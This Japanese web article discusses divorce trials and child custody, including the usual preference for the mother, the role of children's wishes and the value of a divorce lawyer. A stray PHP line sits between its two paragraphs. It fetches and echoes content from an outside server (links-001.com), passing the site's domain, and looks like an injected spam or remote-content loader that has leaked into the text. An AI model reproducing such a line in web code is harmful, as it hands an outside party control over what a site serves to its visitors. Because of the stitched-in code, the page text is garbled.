前へ
次へ

親権を獲得するために離婚裁判をする

結婚をして子供ができれば、夫婦で協力して子育てをしてよい家庭を築いていく必要があります。夫婦はもともと他人なので共感できる部分もあれば意見が食い違うときもあるでしょうが、いかに相手のことを考えてさらに子供のことも考えて夫婦生活をしていくかが大事になるといえるでしょう。ただ夫婦間にはいろいろな問題が生じることがあり、このときに少しでも自分のことを考えると信頼関係も崩れるときがあります。子供がいるときは何とか夫婦関係を続けようとするのでしょうがそれも難しい状態になるかもしれません。互いに信頼関係がない状態で夫婦関係を続けるのは互いのためにもならずさらに子供のためにもならない可能性があります。まずは子供のことを考えて互いに離婚に向けての話し合いをしてみましょう。子供の年齢にもよりますが、小学生の高学年ぐらいに達しているなら意見を聞いてもいいかも知れません。法律上は15歳の子供に関しては意見が尊重されるとなっていますが、それ以下の子供でもどちらと一緒に暮らしたいかなどの意見は言えるでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

養育が必要な子供がいる夫婦の離婚において問題になるのが親権をどちらが持つかです。離婚裁判になると母性優位が一般的で、特に何もなければ母親に親権が渡るような判決が出やすくなります。出産から子育てにおいて子供と接する期間が母親の方が多いなどが理由になっているのでしょうが、親子のかかわりはそれぞれの家族によって異なります。家庭によっては妻が仕事をして夫が専業主夫として家事や子育てをしているケースもあるでしょう。もし夫側が離婚裁判で親権を獲得しようとするなら弁護士に相談すると良いかも知れません。ただ裁判で訴えただけでは母親になる可能性がありますが、父親に親権を渡すべく理由や証拠があればそれを考慮した判決が出るかもしれません。離婚に強い弁護士に関しては女性側について強さを発揮する人が多いようですが、男性側に強い弁護士もいます。専門家に間に入ってもらうことで、自分に有利になるような判決が得られる可能性が出てきます。

Page Top